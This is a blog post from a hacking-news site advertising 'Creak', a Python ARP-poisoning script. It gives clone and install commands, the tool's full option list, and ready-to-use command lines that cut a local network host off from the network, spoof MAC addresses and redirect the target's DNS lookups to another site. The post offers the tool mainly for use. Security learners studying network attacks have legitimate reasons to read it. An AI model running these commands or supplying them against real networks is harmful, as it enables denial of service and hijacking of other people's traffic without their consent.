Exploitation

Creak – ARP Poison Attack Script

By root

Posted on November 22, 2016

Deny navigation and download capabilities of a target host in the local network performing an ARP poison attack and sending reset TCP packets to every request made to the router. Born as a didactic project for learning python language.

Installation

$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install

or simply clone the repository and run the creak.py after all requirements are installed:

$ git clone https://github.com/codepr/creak.git

It is required to have installed pcap libraries for raw packet manipulations and dpkt module, for dns spoofing options is required to have installed dnet module from libdnet package, do not confuse it with pydnet (network evaluation tool) module. It can use also scapy if desired, can just be set in the config.py file.

Options

Usage: creak.py [options] dev

Options:
  -h, --help           show this help message and exit
  -1, --sessions-scan  Sessions scan mode
  -2, --dns-spoof      Dns spoofing
  -x, --spoof          Spoof mode, generate a fake MAC address to be used
                       during attack
  -m MACADDR           Mac address octet prefix (could be an entire MAC
                       address in the form AA:BB:CC:DD:EE:FF)
  -M MANUFACTURER      Manufacturer of the wireless device, for retrieving a
                       manufactur based prefix for MAC spoof
  -s SOURCE            Source ip address (e.g. a class C address like
                       192.168.1.150) usually the router address
  -t TARGET            Target ip address (e.g. a class C address like
                       192.168.1.150)
  -p PORT              Target port to shutdown
  -a HOST              Target host that will be redirect while navigating on
                       target machine
  -r REDIR             Target redirection that will be fetched instead of host
                       on the target machine
  -v, --verbose        Verbose output mode
  -d, --dotted         Dotted output mode

Example

Most basic usage: Deny all traffic to the target host

$ python creak.py -t 192.168.1.30 wlan0

Set a different gateway:

$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0

Set a different mac address for the device:

$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0

Spoof mac address generating a fake one:

$ python creak.py -x -t 192.168.1.30 wlan0

Spoof mac address generating one based on manufacturer(e.g Xeros):

$ python creak.py -x -M xeros -t 192.168.1.30 wlan0

DNS spoofing using a fake MAC address, redirecting ab.xy to cd.xz(e.g. localhost):

$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0

Related Items:arp poision a network, arp poison attack, arp poison download, creak, Creak - ARP Poison Attack Script

MrHacker

Creak – ARP Poison Attack Script

Installation

Options

Example

Latest News

Russian Hacker Dmitry Khoroshev Unmasked as LockBit Ransomware Administrator

APT42 Hackers Pose as Journalists to Harvest Credentials and Access Cloud Data

China-Linked Hackers Used ROOTROT Webshell in MITRE Network Intrusion

China-Linked Hackers Suspected in ArcaneDoor Cyberattacks Targeting Network Devices

New ‘Cuckoo’ Persistent macOS Spyware Targeting Intel and Arm Macs

Links

Pin It on Pinterest